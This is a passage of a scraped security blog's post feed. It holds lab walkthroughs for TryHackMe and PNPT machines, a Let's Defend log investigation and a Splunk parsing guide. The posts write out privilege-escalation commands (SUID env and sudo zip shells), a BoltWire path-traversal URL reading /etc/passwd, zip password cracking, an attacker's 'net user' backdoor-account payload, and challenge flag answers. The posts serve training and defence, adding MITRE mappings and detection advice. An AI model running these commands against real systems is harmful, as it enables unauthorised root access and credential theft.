directory:\nwhoami uname -a ls -la I spotted user.txt and grabbed the first flag:\ncat user.txt 🎉 User flag: 90d6f99258581ff991e68748c414740\nInvestigating the Environment #While poking around the user\u0026rsquo;s home directory, I noticed a pics folder. Naturally, I took a look:\ncd pics ls It contained only two .jpg files. No hidden credentials or encoded data here — just a decoy or clutter.\nFailed Sudo Escalation Attempt #I tried to list sudo privileges:\nsudo -l Got hit with a TTY-related error:\nsudo: no tty present and no askpass program specified I upgraded to a full TTY using Python:\npython3 -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; After that, I attempted to execute a sudo -l command again, but it prompted for a password — which I didn’t have. I moved on.\nPrivilege Escalation Through SUID Binaries #Time to escalate. I searched the system for files with the SUID bit set:\nfind / -type f -perm -04000 -ls 2\u0026gt;/dev/null Most binaries were standard… except one stood out:\n/usr/bin/env --- Using /usr/bin/env to Gain Root #According to GTFOBins, if env has the SUID bit set, it can be abused to spawn a root shell like this:\n/usr/bin/env /bin/bash -p I gave it a shot:\n/usr/bin/env /bin/bash -p Then confirmed I had root with:\nwhoami id ls /root cat /root/root.txt 🎉 Root flag: 4d930091c31a622a7ed10f27999af363\nTryHackMe Room Questions \u0026amp; Answers # Question Answer Enumerate the machine. How many ports are open? 4 What service is running on port 21? ftp What service is running on ports 139 and 445? smb There\u0026rsquo;s a share on the user\u0026rsquo;s computer. What\u0026rsquo;s it called? pics What is the content of the user.txt flag? 90d6f99258581ff991e68748c414740 What is the content of the root.txt flag? 4d930091c31a622a7ed10f27999af363 Final Thoughts #The Anonymous box offered a perfect mix of enumeration, scripting insight, and privilege escalation with real-world implications:\nFTP services left open to the world can become footholds Writable scripts can be as dangerous as remote exploits SUID misconfigurations like env are often overlooked 💡 This room was a strong reminder that even simple misconfigurations can lead to complete system compromise. Consistent enumeration and knowing where to look — like SUID binaries and writable scripts — can make all the difference. Tools like GTFOBins aren\u0026rsquo;t just helpful — they\u0026rsquo;re essential in every pentester\u0026rsquo;s toolkit.\n","date":"March 3, 2025","permalink":"https://notesbynisha.com/posts/2025-03-03-anonymous-rooted/","section":"Writing","summary":"This walkthrough covers the TryHackMe \u0026lsquo;Anonymous\u0026rsquo; room. I gain user-level access via FTP and a writable script, capture the user flag, and escalate to root via a SUID misconfiguration.","title":"Anonymous Rooted: A TryHackMe Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/linux/","section":"Tags","summary":"","title":"Linux"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/suid/","section":"Tags","summary":"","title":"Suid"},{"content":"Introduction #In this article, I walk through my successful compromise of the Dev Box from TCM Security’s PNPT training course. The process spans reconnaissance, exploitation, and privilege escalation. I’ll also detail relevant mitigation strategies and map the techniques used to the MITRE ATT\u0026amp;CK framework to enhance threat defense practices.\nReconnaissance and Initial Enumeration #I began by conducting a full TCP port and service version scan using Nmap:\nnmap -p- -A -T4 10.0.100.12 The following ports were discovered open:\n22 (SSH) 80 (HTTP) 111 (RPC) 2049 (NFS) 8080 (HTTP-alt) 32771, 33727, 36393, 40821 (RPC-related ports) Visiting the web service on port 80 in the browser revealed a default Apache web page referencing Bolt CMS.\nThis Bolt - Installation Error page is a default message that appears when Bolt CMS is installed in the wrong web directory. Instead of pointing to /var/www/html/public/, the web server is configured to serve from /var/www/html/. This misconfiguration inadvertently exposes internal application files and setup instructions.\nWhy This Matters\nInformation Disclosure: Confirms Bolt CMS use and reveals internal paths.\nFingerprinting Opportunity: Opens the door to version-specific exploits.\nMisconfigured Web Root: Risks exposing files that should remain private.\nPort 8080 displayed a PHP information disclosure page, exposing server-level details including Apache and PHP versions, modules, and configuration paths.\nWhile continuing to investigate, I launched directory brute-force scans on both ports using FFUF:\nffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.0.100.12/FUZZ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.0.100.12:8080/FUZZ With scans in progress, I turned to explore services revealed by Nmap.\nNFS Enumeration and Credential Discovery\nPort 2049 revealed a running NFS service. Using showmount, I queried the exported directories:\nshowmount -e 10.0.100.12 The output indicated that /srv/nfs was being shared and was accessible to the entire 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 network ranges. This represents a dangerous misconfiguration.\n🔓 Why is this important?\nMountable shares may contain clear-text credentials or sensitive project files.\nWeak NFS configurations (e.g., missing root squashing) can be abused for privilege escalation or lateral movement.\nI mounted the NFS share locally to inspect its contents:\nmkdir /mnt/dev mount -t nfs 10.0.100.12:/srv/nfs /mnt/dev cd /mnt/dev Once inside the mounted directory, I discovered a suspicious file named save.zip:\nAttempting to unzip it revealed that the archive was password protected :\nSince the password wasn’t known, I used fcrackzip and the popular rockyou.txt wordlist to brute-force it:\nsudo fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip The password was successfully found: java101.\nI extracted the archive using the recovered password, which revealed two artifacts:\nid_rsa - a private SSH key todo.txt - a plaintext file with developer notes I inspected the todo.txt file for clues:\ncat todo.txt These notes provided valuable intel:\nThe user (presumably with initials jp) is a developer on this box.\nThe reference to Java correlates with the cracked password java101, which may be reused elsewhere.\nThe presence of a private SSH key and the jp initials hinted at an SSH login opportunity.\nNext, I attempted to connect over SSH using the private key and the username jp:\nssh -I id_rsa jp@10.0.100.12 However, this prompted for a passphrase for the key, indicating additional protection was in play.\nDirectory Busting Results and Discovery\nAt this point I decided to continue on with my post-scan analysis, revisiting the results of the FFUF directory brute-force scans.\nPort 80 Directory Results\nSeveral directories responded with 301 Moved Permanently HTTP status codes, indicating redirection. These included:\n/public\n/src\n/app\n/vendor\n/extensions\nThis suggested the presence of potentially accessible internal application folders that may contain sensitive files or configuration data.\nPort 8080 Directory Results\nOn port 8080, the FFUF scan revealed a /dev directory that responded with a 301 redirect and a 200 OK, indicating successful content retrieval. This was especially interesting in the context of the earlier discovery in todo.txt, where the user “jp” mentioned working on a development website and their love for Java.\nThis clue aligned perfectly with the /dev path and prompted me to investigate further.\nDiscovering BoltWire CMS on Port 8080\nFrom the results of my FFUF scan on port 8080, the /dev directory really stood out. Based on earlier hints in the todo.txt file referencing a development website and the user\u0026rsquo;s interest in Java, this directory warranted further exploration.\nI visited the /dev endpoint in the browser:\nhttp://10.0.100.12:8080/dev/ To my surprise, this led to a BoltWire CMS setup page confirming the application had been successfully deployed.\nThis page indicated that the CMS instance was live and functional—an excellent opportunity to enumerate further and possibly find a way to exploit the system.\nExploring Web-Exposed Directories\nI explored several of the directories discovered during the directory brute-force scan on port 80:\nInitially, most of these appeared uninteresting or led to generic index listings. But when I navigated to the /app/config/ directory, I found a goldmine of potential configuration files:\nOpening the config.yml file revealed hardcoded database credentials:\nThis included a username of bolt and a password of I_love_java, which immediately stood out based on previous hints and findings (like the Java-related comment in the todo.txt file). At this point, I made note to try these credentials later in the enumeration and exploitation stages.\nIdentifying BoltWire Version and Planning Exploitation\nAfter logging into the BoltWire CMS running on port 8080 BoltWire CMS running on port 8080, I explored various available actions. Although I was able to register and log in successfully, no direct administrative functionality was accessible from the dashboard.\nHowever, clicking the print action in the navigation bar triggered an information disclosure that revealed the exact CMS version in use:\nVersion Disclosure: The message revealed that the site was running BoltWire version 6.03.\nThis was a pivotal moment. With the exact version known, I pivoted to researching known exploits for BoltWire 6.03.\nA quick search on Google and Exploit-DB surfaced a known Local File Inclusion (LFI) vulnerability associated with this version. This exploit would allow me to access sensitive system files if successfully executed.\nhttps://www.exploit-db.com/exploits/48411 Choosing the Exploitation Path #After reviewing the available options, I determined that the Local File Inclusion (LFI) exploit was the most appropriate path forward for the following reasons:\n✅ It directly matched the confirmed BoltWire CMS version (6.03).\n✅ It required only an authenticated user—a condition I had already met by registering on the site.\n✅ It leveraged the application\u0026rsquo;s predictable URL routing pattern, allowing for payload injection.\n✅ It offered a direct path to sensitive file disclosure and opened the door to further privilege escalation opportunities.\nArmed with this information, I proceeded to test the vulnerability.\nPerforming Local File Inclusion\nThe exploit format from ExploitDB ID 48411 requires a GET request to:\n/dev/index.php?p=action.search\u0026amp;action=../../../../../../../etc/passwd Because I was already authenticated from registering and logging in earlier, I could perform the attack by navigating directly to the LFI path in the browser:\nhttp://10.0.100.12:8080/dev/index.php?p=action.search\u0026amp;action=../../../../../../../../etc/passwd This successfully disclosed the contents of the /etc/passwd file.\nIdentifying Valid User Accounts\nScrolling through the output, I came across a user named jeanpaul. This stood out because it aligned with the initials jp from the previously recovered todo.txt file found inside the NFS share.\nThis was a strong lead — it suggested a valid system user, potentially with a home directory and SSH access.\nGaining SSH Access as JeanPaul\nNow that I had a valid username (jeanpaul) and a private key (id_rsa) recovered from the mounted NFS share, I attempted to SSH into the target system using the following command:\nsudo ssh -I id_rsa jeanpaul@10.0.100.12 The system prompted me for the key passphrase. At this point, I reflected on artifacts previously recovered:\nThe todo.txt file contained a note that said: “Keep coding in Java because it’s awesome.”\nThe config.yml exposed a password value: i_love_java\nTaking a calculated guess, I tried the password i_love_java as the key passphrase—and it worked! I successfully authenticated and gained shell access to the system as user jeanpaul.\nWith access to jeanpaul, it was time to explore how I could elevate to root.\nPost-Exploitation: Local Enumeration and Privilege Escalation Path #After gaining shell access as user jeanpaul, I immediately ran standard enumeration commands to understand the system context and check for privilege escalation vectors.\nls pwd history sudo -l From the output of sudo -l, I discovered that jeanpaul had NOPASSWD permissions to run /usr/bin/zip as root—without requiring a password. This is a huge find, as it can be abused for privilege escalation!\nThis revealed that the zip binary could be run with root privileges. To investigate potential abuses, I consulted GTFOBins, which confirmed that zip is a known escalation vector if misconfigured this way.\nGTFOBins Guidance\nIf the zip binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to escalate or maintain privileged access.\nExecuting the Exploit #Using the GTFOBins-provided payload, I created a temporary file, invoked zip with the -T and -TT flags, and injected a shell:\nTF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT \u0026#39;sh #\u0026#39; sudo rm $TF Root Access Achieved #The command successfully spawned a shell as root. I confirmed root-level access with:\nid cd /root cat flag.txt And there it was—the flag:\nCongratz on rooting this box!\nDetection Opportunities and ATT\u0026amp;CK Matrix #MITRE ATT\u0026amp;CK Framework Mapping and Mitigation Strategies #To strengthen the defensive posture of environments against similar exploitation paths, it\u0026rsquo;s crucial to align the observed attacker techniques with the MITRE ATT\u0026amp;CK framework. This provides defenders with visibility into how adversaries operate, and what countermeasures can be implemented to reduce risk.\nTechnique Description Tactic T1135 - Network Share Discovery The attacker discovered open NFS shares via showmount -e. Discovery T1003.001 - OS Credential Dumping: LSASS Memory Credentials were harvested from NFS-mounted directories, including SSH private keys. Credential Access T1059.004 - Command and Scripting Interpreter: Unix Shell The attacker used Bash to interact with the system and chain privilege escalation. Execution T1003 - Credential Dumping The attacker extracted SSH private keys and cracked ZIP file passwords with fcrackzip. Credential Access T1552.001 - Unsecured Credentials: Credentials in Files Bolt CMS configuration files exposed database credentials in plaintext. Credential Access T1190 - Exploit Public-Facing Application LFI vulnerability in BoltWire CMS was exploited to leak sensitive files. Initial Access T1068 - Exploitation for Privilege Escalation GTFOBins technique via zip used for local privilege escalation. Privilege Escalation T1078 - Valid Accounts SSH login was performed using cracked private key and password. Persistence Mitigation Strategies # Mitigation Description M1021 - Restrict Web-Based Content Disable directory indexing on web servers to prevent file listing and direct file access. M1040 - Behavior Prevention Monitor and alert on suspicious usage of binaries like zip, especially when used via sudo. M1022 - Restrict File and Directory Permissions Enforce least privilege for file access. NFS shares should be restricted and root squash enabled. M1012 - Vulnerability Scanning Regular vulnerability assessments could have identified the misconfigured Bolt CMS installation. M1042 - Disable or Remove Feature or Program Avoid enabling unnecessary binaries (e.g., zip as sudo) unless absolutely required. M1047 - Audit Log and monitor usage of sensitive paths like /etc/, access to SSH keys, and execution of privilege escalation binaries. Detection Opportunities #These are specific areas where defenders could have detected malicious activity during the compromise of the Dev Box. Mapping them to log sources and behaviors helps defenders create alerts, dashboards, and hunt queries.\nLog Source / Control Point Detection Focus Web Server Logs Detect URL path traversal attempts (e.g., ../../etc/passwd) via access.log. Authentication Logs Monitor for SSH login using id_rsa, especially from unknown IPs or for new users. File Access Logs (auditd) Track reads to sensitive files like id_rsa, config.yml, or /etc/passwd. Sudo Command Logs Alert on unusual sudo usage involving zip with -T and -TT flags. NFS Server Logs Detect remote mounts to development shares from unauthorized IPs. BoltWire Application Logs Look for new account registrations or access to the action parameter. Network Monitoring (IDS/IPS) Flag outbound requests containing traversal strings or repeated LFI attempts. Final Thoughts #This walkthrough of the Dev Box from TCM Security’s PNPT training course demonstrates how layered misconfigurations—when chained together—can lead to a full system compromise. From open NFS shares and exposed credentials, to LFI vulnerabilities and weak privilege escalation controls, each weakness contributed to the overall attack path.\nAlong the way, we:\nPerformed full port scanning and service enumeration\nExploited a misconfigured NFS share to recover sensitive credentials\nLeveraged LFI in BoltWire CMS to enumerate system users\nAuthenticated via SSH using a cracked private key\nEscalated privileges to root using a GTFOBins zip sudo misconfiguration\n🔑 Key Takeaways: # Always sanitize and secure public-facing services—even development tools.\nAvoid storing credentials and SSH keys in accessible locations like NFS shares.\nRegular audits of sudoers configurations can prevent privilege escalation.\nUse the MITRE ATT\u0026amp;CK framework to understand and defend against attacker behaviors.\nBy analyzing how attackers move laterally and escalate privileges, defenders can better anticipate and respond to real-world threats.\nThanks for reading!\n🛡️ Stay curious, stay secure. — Notes by Nisha\n","date":"December 7, 2024","permalink":"https://notesbynisha.com/posts/2024-12-07-devbox-pnpt-walkthrough/","section":"Writing","summary":"A step-by-step walkthrough of compromising the Dev Box from TCM Security’s PNPT training course, including detailed explanations, mitigation steps, and a comprehensive mapping to MITRE ATT\u0026amp;CK tactics and techniques.","title":"Compromising the Dev Box: A PNPT Walkthrough with Mitigation and MITRE ATT\u0026CK Mapping"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/exploitation/","section":"Tags","summary":"","title":"Exploitation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/mitre-attck/","section":"Tags","summary":"","title":"MITRE ATT\u0026CK"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/pnpt/","section":"Tags","summary":"","title":"PNPT"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/brute-force/","section":"Tags","summary":"","title":"Brute Force"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/osint/","section":"Tags","summary":"","title":"OSINT"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/penetration-testing/","section":"Tags","summary":"","title":"Penetration Testing"},{"content":"Overview #This walkthrough documents my experience completing the Enumeration \u0026amp; Brute Force room on TryHackMe. The room provides hands-on experience with various enumeration techniques, brute force attacks, and web application vulnerability exploitation. This write-up details my approach to each task and the key learning points along the way.\nTask 1: Introduction #The introduction task provides an overview of what we\u0026rsquo;ll be learning in this room. No answers are required for this section, but it sets up important context for the upcoming challenges.\nKey topics covered in this room include:\nAuthentication enumeration techniques User enumeration methodologies Password reset vulnerabilities HTTP Basic Authentication exploitation OSINT (Open Source Intelligence) Task 2: Authentication Enumeration #This task introduces the concept of authentication enumeration and how seemingly harmless error messages can provide attackers with valuable information.\nQuestion: What type of error messages can unintentionally provide attackers with confirmation of valid usernames? Answer: Verbose errors\nExplanation #Verbose error messages are a common security misconfiguration that can leak sensitive information. When a system provides different error messages for:\nInvalid username: \u0026ldquo;User does not exist\u0026rdquo; Valid username but wrong password: \u0026ldquo;Incorrect password\u0026rdquo; This differential response allows attackers to enumerate valid usernames by observing the error messages.\nTask 3: Enumerating Users #This task provides practical experience with user enumeration techniques using actual tools and methodologies.\nQuestion: What is the valid email address from the list? Answer: canderson@gmail.com\nMethodology # Started with a common username list from GitHub Analyzed server responses for different usernames Identified patterns in error messages Located the valid email address through response analysis Task 4: Exploiting Vulnerable Password Reset Logic #This section explores common vulnerabilities in password reset functionality and how they can be exploited.\nQuestion: What is the flag? Answer: THM{50_pr3d1ct4BL333!!}\nExploitation Process # Analyzed the password reset functionality Identified predictable reset token patterns Developed a methodology to exploit the vulnerability Retrieved the flag after successful exploitation Task 5: Exploiting HTTP Basic Authentication #This task focuses on exploiting vulnerabilities in HTTP Basic Authentication implementations.\nQuestion: What is the flag? Answer: THM{b4$$1C_AuTTHHH}\nAttack Methodology # Identified the Basic Authentication mechanism Analyzed potential weaknesses Developed and executed exploitation strategy Successfully retrieved the flag Task 6: OSINT #The OSINT task introduces techniques for gathering information from publicly available sources. While no specific answers were required, this section provided valuable insights into:\nSocial media reconnaissance Public data source analysis Information correlation techniques OSINT tool usage Task 7: Conclusion #This room provided comprehensive hands-on experience with various enumeration and brute force techniques. Key takeaways include:\nThe importance of proper error message handling in authentication systems Understanding common vulnerabilities in password reset mechanisms Proper implementation of HTTP Basic Authentication The role of OSINT in security assessments Best practices for preventing enumeration attacks Defensive Recommendations # Implement generic error messages Use secure password reset mechanisms Properly configure authentication systems Regular security assessments Employee security awareness training If you\u0026rsquo;re interested in trying this room yourself, you can find it on TryHackMe.\nAdditional Resources # OWASP Authentication Cheat Sheet OWASP Brute Force Attack Prevention Port Swigger Web Security Academy Remember: This knowledge should be used ethically and legally, preferably in controlled environments like TryHackMe rooms or with explicit permission.\n","date":"November 21, 2024","permalink":"https://notesbynisha.com/posts/2024-11-21-enumeration-brute-force-tryhackme/","section":"Writing","summary":"\u003ch2 id=\"overview\" class=\"relative group\"\u003eOverview \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#overview\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eThis walkthrough documents my experience completing the \u003cstrong\u003eEnumeration \u0026amp; Brute Force\u003c/strong\u003e room on TryHackMe. The room provides hands-on experience with various enumeration techniques, brute force attacks, and web application vulnerability exploitation. This write-up details my approach to each task and the key learning points along the way.\u003c/p\u003e","title":"TryHackMe: Enumeration \u0026 Brute Force Room Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/web-app-security/","section":"Tags","summary":"","title":"Web App Security"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/incident-response/","section":"Tags","summary":"","title":"Incident Response"},{"content":"Investigating Web Attacks Challenge Walkthrough (Let\u0026rsquo;s Defend) #In this post, I\u0026rsquo;ll walk you through solving the \u0026ldquo;Investigating Web Attacks Challenge\u0026rdquo; from Let\u0026rsquo;s Defend. The challenge uses logs sourced from the bWAPP web application, an intentionally vulnerable app designed to help security professionals practice identifying and analyzing real-world attack patterns. In this guide, I\u0026rsquo;ll show you how I analyzed the logs to answer each question.\n--- Question 1: Which automated scan tool did the attacker use for web reconnaissance? #At line 30, I found Nikto in the User-Agent string, confirming that the attacker used Nikto, a popular web vulnerability scanning tool.\nAnswer: Nikto\n--- Question 2: After web reconnaissance, which technique did the attacker use for directory listing discovery? #The Nikto User-Agent strings continued throughout the log. I used this command to jump to the last Nikto entry:\ngrep -n \u0026#34;Nikto\u0026#34; access.log | tail -n 1 Reviewing the subsequent requests, I noticed the attacker was attempting to enumerate directory paths in alphabetical order, many of which returned 404 Not Found responses. This pattern is consistent with directory brute forcing.\nAnswer: Directory brute force\n--- Question 3: What is the third attack type after directory listing discovery? #After directory brute force, the attacker shifted to a brute-force login attack. Logs showed repeated POST requests to /bWAPP/login.php with the same User-Agent string, indicating attempts to guess credentials.\nAnswer: Brute force\n--- Question 4: Is the third attack successful? #Yes. The brute force login attempt was successful. The logs showed HTTP status codes changing from 200 OK to 302 Found, which indicates redirection after a successful login. Additionally, the response size increased significantly, confirming the login.\nAnswer: Yes\n--- Question 5: What is the name of the fourth attack? #After gaining access, the attacker launched a code injection attack. Logs revealed payloads with system commands passed into URL parameters.\nAnswer: Code injection\n--- Question 6: What is the first payload for the fourth attack? #The first injected command was:\nwhoami This was sent through the vulnerable phpi.php script to determine the current system user.\nAnswer: whoami\n--- Question 7: Is there any persistency clue for the victim machine in the log file? If yes, what is the related payload? #Yes. The attacker attempted persistence by creating a new user account. The payload was:\nsystem(\u0026#39;net user hacker Asd123!! /add\u0026#39;) This would create a user named hacker with the password Asd123!!. Persistence could be extended by adding this account to the administrator group.\nAnswer: %27net%20user%20hacker%20Asd123!!%20/add%27\n--- Conclusion #By analyzing the logs step by step, I identified that the attacker:\nUsed Nikto for reconnaissance Performed directory brute forcing Launched a brute-force login attack Exploited the system with code injection Attempted persistence by creating a new user This challenge highlights the importance of monitoring web server logs for suspicious activity and demonstrates how attackers chain multiple techniques to compromise systems.\nI hope this walkthrough helps you approach the \u0026ldquo;Investigating Web Attacks Challenge\u0026rdquo; on Let\u0026rsquo;s Defend with confidence.\n","date":"October 16, 2024","permalink":"https://notesbynisha.com/posts/2024-10-16-investigate-web-attacks-lets-defend-walkthrough/","section":"Writing","summary":"A detailed walkthrough of how to solve the \u0026lsquo;Investigating Web Attacks Challenge\u0026rsquo; on Let\u0026rsquo;s Defend using the bWAPP web application as the victim.","title":"Investigate Web Attacks Challenge Walkthrough (Let's Defend)"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/lets-defend/","section":"Tags","summary":"","title":"Let's Defend"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/web-application-security/","section":"Tags","summary":"","title":"Web Application Security"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/data-parsing/","section":"Tags","summary":"","title":"Data Parsing"},{"content":"As cybersecurity professionals, one of the key challenges we often face is the sheer volume of log data we need to analyze. Whether we\u0026rsquo;re hunting for anomalies, investigating security incidents, or just keeping an eye on our network’s health, efficiently processing log data is important. I recently had the opportunity to further explore Splunk Data Administration, specifically the Parsing Phase and Data Preview—two areas that fundamentally shape how Splunk processes incoming data and prepares it for analysis. In this post, I\u0026rsquo;ll share what I learned and how these skills relate to my daily work.\nUnderstanding the Flow of Data in Splunk #Splunk handles massive amounts of data from various sources—whether it’s logs from systems, network data, or even scripts. Understanding how data flows through Splunk is key to ensuring it is properly processed and indexed for analysis. Here\u0026rsquo;s a quick breakdown of the overall data flow:\nInput Stage – Data is ingested from log files, network devices, scripts, or forwarders and prepared for further processing. Parsing (Event Processing) Stage – This is where Splunk breaks incoming data into events, extracts timestamps, and applies configurations like regular expressions (regex) for line breaking and data masking. These steps are essential for structuring unorganized data and making it useful for analysis. Indexing Stage – After parsing, the structured events are written to disk and indexed, making them ready for future searches. Search Stage – Once indexed, data becomes available for searching, reporting, and alerting through the Splunk search head. In this article, I\u0026rsquo;ll be focusing on the Parsing Stage, where I worked on event line breaking, time extraction, and masking sensitive PII data to make logs more structured and easier to analyze, especially logs from sources like Web Application Firewalls (WAF).\nYou may reference official Splunk documentation for more details about managing event processing on Splunk.\nTackling Event Line Breaking #One of the most valuable aspects of the session was learning how to configure event line breaking in Splunk, a skill that’s essential when dealing with unstructured data. At work, I often have to analyze Web Application Firewall (WAF) logs, and let me tell you, those logs can be a nightmare. WAF logs are usually unstructured and often look like a wall of text, which we jokingly refer to as “log vomit.”\nTo help me create the right regex patterns for breaking these logs into structured events, I used regex101.com, an online regex editor. This tool was invaluable in allowing me to test my regular expressions in real-time and ensure they would correctly match the patterns in the logs.\nBy applying the regular expressions (regex) I developed, I was able to identify event boundaries in the logs, split them into individual events, and make the data far more readable. In this case, I worked with JSON logs, using regex to match each event tag and successfully split the logs into structured events.\nHere’s an example of how I used regex101 to fine-tune my regex patterns:\n\u0026lt;event\u0026gt;([\\r\\n]+)? This skill has been directly applicable to my daily work. By teaching Splunk how to interpret the chaotic structure of WAF logs, I’ve significantly reduced the time it takes to analyze them.\nTime Extraction Made Simple #Another challenge that came up during the session was the issue of time extraction. In some cases, multiple alerting events get grouped together in a single log file, which makes it difficult to pinpoint when each event occurred. I learned how to handle this by using a timestamp prefix and a regex lookahead to identify and extract the exact timestamp from each event.\nIn this particular scenario, a strptime() format of %m/%d/%Y was used, which allowed Splunk to accurately interpret the timestamps in the logs. By configuring Splunk to recognize these patterns, I was able to separate events with precision and ensure the timeline was correct, improving the quality of my log analysis.\nMasking PII for Data Privacy #As security professionals, protecting sensitive information is always top of mind, especially when dealing with Personally Identifiable Information (PII). In this session, I worked with logs that contained Social Security Numbers, which is highly sensitive data that should be masked to prevent exposure.\nUsing a regex pattern and updating the props.conf file, I configured Splunk to automatically mask PII in incoming data. The regular expression in sed mode I used, | rex mode=sed \u0026quot;s/\\d{3}-\\d{2}-\\d{4}/xxx-xx-xxxx/g\u0026quot;, allowed me to replace the Social Security Numbers with a masked format across all events. This is an essential technique for ensuring compliance with data privacy regulations like GDPR or HIPAA.\ns/\\d{3}-\\d{2}-\\d{4}/xxx-xx-xxxx/g Introducing the Magic 6 in props.conf #During the session, I also learned about the Magic 6—a set of six key settings in Splunk’s props.conf file that control how incoming data is processed. Mastering these settings is essential for configuring how Splunk breaks events, extracts timestamps, and structures data for analysis. Here’s a brief overview:\nSHOULD_LINEMERGE – Determines whether Splunk should merge multiple lines into a single event. LINE_BREAKER – Defines the pattern for identifying the start of a new event. TIME_PREFIX – Specifies the pattern that precedes the timestamp in the log. TIME_FORMAT – Defines the format of the timestamp (e.g., %m/%d/%Y). MAX_TIMESTAMP_LOOKAHEAD – Specifies how far Splunk should look to find a timestamp. TRUNCATE – Limits the number of characters Splunk reads from an event. In addition to the Magic 6, there’s also the Magic 8, which includes two more settings: DATETIME_CONFIG and BREAK_ONLY_BEFORE. These are helpful when dealing with more complex log structures, such as multi-line events.\nApplying These Skills in Real-World Scenarios #The skills I learned in this hands-on session have already had a direct impact on how I handle logs in my day-to-day work. WAF logs that once took me hours to analyze can now be broken down and structured in minutes, and I’m better equipped to protect sensitive data like PII. Additionally, understanding the Magic 6 in the props.conf file has improved my ability to fine-tune how Splunk processes and organizes incoming data.\nIf you’re looking to optimize your Splunk Data Administration skills, I highly recommend diving into the Parsing Phase, focusing on event line breaking, time extraction, and working with the props.conf file. These skills are not only useful for analyzing complex logs but also for ensuring data privacy and compliance.\nStay tuned for more hands-on insights!\nIn my future posts, I’ll be sharing even more tips and techniques to improve your Splunk data analysis and threat detection workflows.\n","date":"October 13, 2024","permalink":"https://notesbynisha.com/posts/2024-10-13-splunk-data-administration-parsing-phase/","section":"Writing","summary":"\u003cp\u003eAs cybersecurity professionals, one of the key challenges we often face is the sheer volume of log data we need to analyze. Whether we\u0026rsquo;re hunting for anomalies, investigating security incidents, or just keeping an eye on our network’s health, efficiently processing log data is important. I recently had the opportunity to further explore Splunk Data Administration, specifically the \u003cstrong\u003eParsing Phase\u003c/strong\u003e and \u003cstrong\u003eData Preview\u003c/strong\u003e—two areas that fundamentally shape how Splunk processes incoming data and prepares it for analysis. In this post, I\u0026rsquo;ll share what I learned and how these skills relate to my daily work.\u003c/p\u003e","title":"Exploring Splunk Data Administration: Parsing, Event Line Breaking, and Data Privacy"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/magic-6/","section":"Tags","summary":"","title":"Magic 6"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/pii-masking/","section":"Tags","summary":"","title":"PII Masking"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/regex/","section":"Tags","summary":"","title":"Regex"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/splunk/","section":"Categories","summary":"","title":"Splunk"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/splunk/","section":"Tags","summary":"","title":"Splunk"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/waf-logs/","section":"Tags","summary":"","title":"WAF Logs"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/blue-team/","section":"Tags","summary":"","title":"Blue Team"},{"content":"Introduction #Welcome back to Notes By Nisha! In this walkthrough, we\u0026rsquo;ll explore the Kernel Exploits section of the Linux Privilege Escalation room on TryHackMe.\nI\u0026rsquo;ll walk you through the steps I took to escalate privileges on the target machine, and as a Blue Teamer at heart, I\u0026rsquo;ll follow up with defensive strategies mapped to the MITRE ATT\u0026amp;CK Framework.\nTask 1 - Introduction #This TryHackMe room covers privilege escalation techniques on Linux systems. In this section, we focus on exploiting a kernel vulnerability to gain root access.\nTask 2 - What is Privilege Escalation? #Privilege escalation occurs when an attacker exploits a flaw to elevate their access rights. On Linux systems, this often means escalating from a standard user to root, gaining complete control over the system.\nTask 3 - Enumeration #Enumeration is a critical step in identifying potential privilege escalation paths. Here\u0026rsquo;s how I approached it on the target machine.\nQ: What is the hostname of the target system?\nhostname Answer: wade7363\nQ: What is the Linux kernel version of the target system?\nuname -r Answer: 3.13.0-24-generic\nQ: What Linux is this?\ncat /etc/os-release Answer: Ubuntu 14.04 LTS\nQ: What version of the Python language is installed on the system?\npython --version Answer: 2.7.6\nQ: What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)\nUsing the kernel version we discovered, I performed a Google search:\nThis led me to CVE-2015-1328, a vulnerability in overlayfs that allows privilege escalation.\nhttps://www.exploit-db.com/exploits/37292\nAnswer: CVE-2015-1328\nTask 4 - Automated Enumeration Tools #Automated enumeration tools are essential when auditing a Linux system for privilege escalation opportunities. These tools speed up the process by identifying kernel versions, misconfigurations, and more.\nHere are some commonly used tools:\nLinPEAS\nA comprehensive script for Linux privilege escalation auditing. It checks for misconfigurations, kernel vulnerabilities, and more.\nLinEnum\nAutomates the process of gathering information on a system to identify potential escalation vectors.\nLES (Linux Exploit Suggester)\nSuggests possible exploits for the system based on kernel version and other parameters.\nLinux Smart Enumeration\nA script for gathering system information and highlighting potential privilege escalation paths.\nLinux Priv Checker\nAnother lightweight script that checks for common privilege 